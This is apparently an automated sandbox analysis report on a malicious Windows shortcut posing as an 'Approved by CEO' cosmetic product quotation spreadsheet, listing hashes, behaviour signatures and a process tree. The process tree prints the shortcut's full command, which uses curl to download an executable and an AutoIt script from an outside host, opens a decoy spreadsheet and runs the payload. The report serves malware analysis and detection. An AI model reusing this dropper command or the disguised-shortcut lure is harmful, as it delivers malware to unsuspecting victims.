Analysis
-
max time kernel
119s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20230831-en -
resource tags
-
submitted
29/09/2023, 06:27
General
-
Target
Cosmetic product_list_2023_Quatation.Approved.by.CEO.xls.lnk
-
Size
2KB
-
MD5
f9c403c1c4b55521d5cb06bf5232ca0e
-
SHA1
6f2cd23f0c816475dcbdbc60039c0aa7252a98fd
-
SHA256
716d31755f09d102d83a35276c9c6422c490757eb7c62f9e39a3263ba6057267
-
SHA512
4efcf9f6bf488295c3be1fcf819e618417d86d68125e2bb5d5ac86a8bdcc46d39b0da4276fac787e1881e4d228d64dd4e4bc7dd17dda34351196a59889d28af5
Score
3/10
Malware Config
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of WriteProcessMemory 3 IoCs
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\Cosmetic product_list_2023_Quatation.Approved.by.CEO.xls.lnk"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k curl -# -o "C:\Users\Admin\AppData\Local\Temp\authorizer.exe" "vntricker.abcxzy.com:2351" -o "C:\Users\Admin\AppData\Local\Temp\authorizer.au3" "vntricker.abcxzy.com:2351/msiucwjhslv" -o "C:\Users\Admin\AppData\Local\Temp\Cosmetic product_list_2023_Quatation.Approved.by.CEO.xlsx" "vntricker.abcxzy.com:2351/decucwjhslv" && "C:\Users\Admin\AppData\Local\Temp\Cosmetic product_list_2023_Quatation.Approved.by.CEO.xlsx" && "C:\Users\Admin\AppData\Local\Temp\authorizer.exe" "C:\Users\Admin\AppData\Local\Temp\authorizer.au3"2⤵
-